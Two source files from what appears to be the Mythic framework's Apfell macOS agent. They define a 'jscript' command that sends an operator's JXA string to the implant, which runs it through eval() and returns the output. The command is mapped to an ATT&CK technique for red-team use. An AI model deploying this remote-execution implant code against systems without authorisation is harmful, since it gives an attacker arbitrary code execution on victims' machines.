File: Payload_Types/apfell/mythic/agent_functions/jscript.py
from CommandBase import *
import json


class JscriptArguments(TaskArguments):
    def __init__(self, command_line):
        super().__init__(command_line)
        self.args = {
            "command": CommandParameter(
                name="command",
                type=ParameterType.String,
                description="The JXA command to execute",
            )
        }

    async def parse_arguments(self):
        if len(self.command_line) > 0:
            if self.command_line[0] == "{":
                self.load_args_from_json_string(self.command_line)
            else:
                self.add_arg("command", self.command_line)
        else:
            raise ValueError("Missing arguments")
        pass


class JscriptCommand(CommandBase):
    cmd = "jscript"
    needs_admin = False
    help_cmd = "jscript {command}"
    description = "This runs the JavaScript command, {command}, and returns its output via an eval(). The output will get passed through ObjC.deepUnwrap to parse out basic data types from ObjectiveC and get strings back"
    version = 1
    is_exit = False
    is_file_browse = False
    is_process_list = False
    is_download_file = False
    is_remove_file = False
    is_upload_file = False
    author = "@its_a_feature_"
    attackmapping = ["T1064"]
    argument_class = JscriptArguments

    async def create_tasking(self, task: MythicTask) -> MythicTask:
        return task

    async def process_response(self, response: AgentResponse):
        pass

File: Example_Payload_Type/agent_code/jscript.js
exports.jscript = function(task, command, params){
	//simply eval a javascript string and return the response
	let response = "";
	try{
		let command_params = JSON.parse(params);
		if(!command_params.hasOwnProperty("command")){ return {"user_output": "Missing command parameter", "status": "error", "completed": true};}
		response = ObjC.deepUnwrap(eval(command_params['command']));
	}
	catch(error){
		return {"user_output":error.toString(), "completed": true, "status": "error"};
	}
	if(response === undefined || response === ""){
	    response = "No Command Output";
	}
	if(response === true){
	    response = "True";
	}
	if(response === false){
	    response = "False";
	}
	if(typeof(response) != "string"){
	    response = String(response);
	}
	return {"user_output":response, "completed": true};
};
